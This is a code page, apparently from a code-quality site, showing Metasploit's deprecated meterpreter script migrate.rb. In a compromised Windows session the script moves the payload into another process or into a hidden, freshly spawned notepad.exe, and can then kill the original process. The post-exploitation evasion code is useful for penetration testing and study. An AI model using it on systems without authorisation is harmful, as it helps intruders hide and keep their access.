Sign upLogin

rapid7/metasploit-framework

View on GitHub
Star
scripts/meterpreter/migrate.rb

Summary

Maintainability
A
0 mins
Test Coverage
##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##



#
# Simple example script that migrates to a specific process by name.
# This is meant as an illustration.
#


spawn = false
kill = false
target_pid = nil
target_name = nil

opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-f" => [ false, "Launch a process and migrate into the new process"],
  "-p" => [ true , "PID to migrate to."],
  "-k" => [ false, "Kill original process."],
  "-n" => [ true, "Migrate into the first process with this executable name (explorer.exe)" ]
)

opts.parse(args) { |opt, idx, val|
  case opt
  when "-f"
    spawn = true
  when "-k"
    kill = true
  when "-p"
    target_pid = val.to_i
  when "-n"
    target_name = val.to_s
  when "-h"
    print_line(opts.usage)
    raise Rex::Script::Completed
  else
    print_line(opts.usage)
    raise Rex::Script::Completed
  end
}

# Creates a temp notepad.exe to migrate to depending the architecture.
def create_temp_proc()
  # Use the system path for executable to run
  cmd = "notepad.exe"
  # run hidden
  proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
  return proc.pid
end

# In case no option is provided show help
if args.length == 0
  print_line(opts.usage)
  raise Rex::Script::Completed
end

### Main ###

if client.platform == 'windows'
  server = client.sys.process.open
  original_pid = server.pid
  print_status("Current server process: #{server.name} (#{server.pid})")

  if spawn
    print_status("Spawning notepad.exe process to migrate to")
    target_pid = create_temp_proc
  end

  if target_name and not target_pid
    target_pid = client.sys.process[target_name]
    if not target_pid
      print_status("Could not identify the process ID for #{target_name}")
      raise Rex::Script::Completed
    end
  end

  begin
    print_good("Migrating to #{target_pid}")
    client.core.migrate(target_pid)
    print_good("Successfully migrated to process #{}")
  rescue ::Exception => e
    print_error("Could not migrate in to process.")
    print_error(e)
  end

  if kill
    print_status("Killing original process with PID #{original_pid}")
    client.sys.process.kill(original_pid)
    print_good("Successfully killed process with PID #{original_pid}")
  end
end